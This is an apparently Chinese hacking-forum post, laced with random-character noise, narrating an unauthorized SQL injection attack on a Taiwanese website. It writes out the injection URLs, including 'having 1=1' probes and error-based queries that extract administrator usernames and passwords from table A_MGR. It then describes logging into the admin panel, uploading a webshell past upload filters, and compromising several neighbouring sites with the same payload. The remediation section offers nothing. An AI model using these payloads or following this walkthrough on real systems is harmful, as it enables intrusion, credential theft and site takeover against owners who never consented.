发现一个注入点- X1 e( A* [" Q' U0 S
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
; q. t' k$ J3 D R* N" e
& Y `! n; I, |* O/ B9 X8 Q习惯性的加’having1=1--
" U4 G% Z$ H$ r6 g% x* j+ |$ B" _. ]3 ?! e5 X& ~, h! h+ }7 A$ } x( L
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
- }3 C7 g8 R6 u; I$ m- v! |$ k! H M t8 ]$ P
0
+ ^% e/ ?7 C2 X. p) H3 f9 R' u; Z j. A! o! x+ f1 V
爆出Diary_A.dl_Title(这时候很激动啊)
# x+ {8 X, c, n& L' v6 C" x. e2 Q( c6 R0 X7 z/ G
那么继续8 ^4 \5 f* c) [- i& G- F9 d
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—8 U! u" h/ K7 |6 k H
# r8 r# K! b+ `& z" @继续,一直爆下去
7 K: \* @) w6 @$ I! y& W1 o
; P& A& ]2 C! |: B. p" v- S爆到几个字段和表段 但是没找到需要的管理用户的字段9 ^, D! m% Q2 W+ u. c
, C% M" a" c) q6 n8 B蛋疼了 怎么办 然后去后台登陆页看源码
5 I- L5 H0 M9 ^$ A' f+ D9 m
! X+ _; e& @7 P6 g D+ I02 J; W3 S+ L. d4 ~# G4 Q
$ ]( e# ?. b+ i0 G& R/ _2 QInput name= “ADUID”
) B' Z6 f' ]7 nInput name= “ADPWD”
( p+ v& j* ]) l& s+ o4 q8 v
4 n& v2 T4 G5 H( p% P很幸运 找到了字段那就继续
9 d/ e) T( O( y) W( g( j: q; u找到之后开始爆用户) I: R' w* I: T0 v; _) D+ h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
9 T2 l6 M) q) j8 `爆密码) C4 f8 O3 r9 {3 U6 C; Y! c
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—9 W5 N7 ?! p# A
测试了下 这个注入点只能爆到文章哪里的表
7 G3 b/ Q8 S! m/ [" X
2 R1 q1 Q: ~. w: P9 x' {0 \头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
8 q e1 p l3 s: w
- N! c r% G/ b3 ~) F5 g又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了9 p, R d& y2 }; {; \
I0 w; y/ `* }8 v473) q* O$ _# s# k; J0 D2 b
$ v2 p2 k' ?0 B& Z& `
进后台
: ?# E: G# X$ Q# P! W) O$ f" t
; ?, f, G1 @! {% C7 |+ l) k& j8 a$ B' [* x( [
发现几个上传点 有的地方不能上传 而且防止恶意代码) ~8 c w t: ^6 B Z; A! V d
, Q/ f& m: u4 I2 ^没办法 各种百度各种找大牛 找到一只好像可以突破的马
/ u8 O+ g6 O% a% D+ Q4 ^* Q8 D% B
5 ~4 F" z& m( I0 V' b; S! ^/ I/ _6 d2 s+ ]" Y7 D' P' T
在系统管理那里直接上传 不过没有显示地址
5 B8 p: I( \/ Y( ~$ q5 I: |8 Q8 }3 |6 E" r
再上传一次 抓包 搞定OK: f. e) b' `; c4 q# t( z
4 M% y: ~% X. E
8 H2 Y/ @- t0 l y9 N) G
% a1 U9 S2 w5 U" N, W. d472" O) V' M: t; _
; ]) \/ r( q# c. d4 x3 {# p
晚上不行了 去睡觉。。。+ }+ l' l9 B6 u
第二天刚起床 闲的没事做继续日站吧 8 p' B: Q1 k# u/ X* j/ X
; A( H' T8 T/ m4 _1 T8 d找个站 就把这个站的旁c扫了下; }% K" T9 T) D* @7 s5 R( M
, d. u- w0 T- [5 r7 q r1 i发现c段也有一个购物站 ,然后还和这个站的模板差不多1 `2 ^; H- S" s/ k9 K0 ~1 c2 V1 s6 D
' N/ T' _% r8 X* P" ]/ a- v就找到会员登录口测试1 M G& V b( B1 o' e
+ d& f4 K* o, Z [% _
'and (select top 1 MGR_UID from A_MGR)>0—* ?$ ?# U2 i1 y0 m9 v+ d9 x
果断爆到了 这时候我很激动 通杀1 `1 Y0 C7 N7 v9 j j: I
+ b- v1 E8 k( P) n
再次翻c段1 ^3 C- y( Z3 Z1 f' l( O( \8 |0 `6 s5 n
/ j! Z) Q8 m. I' l$ _: m
翻出几个站 都成功拿下
8 p: J* I. f0 P* {' H: Z
% @9 m6 n' ^2 V, c+ Y/ I
* O9 ~2 R4 R, {/ @/ F8 l* ~" f" [/ t$ c/ f' D
修复方案:' L6 C2 e7 ~( Q4 k/ ]3 D
他们比我专业
" [6 {3 x- A% _. w3 @3 _$ }4 P" ^% H3 Y# d
+ ]- I) i& \: d' r, A
) }* T3 d( D4 D# b& A$ t; t
|
发表于 2013-4-4 17:40:38
收藏
支持
反对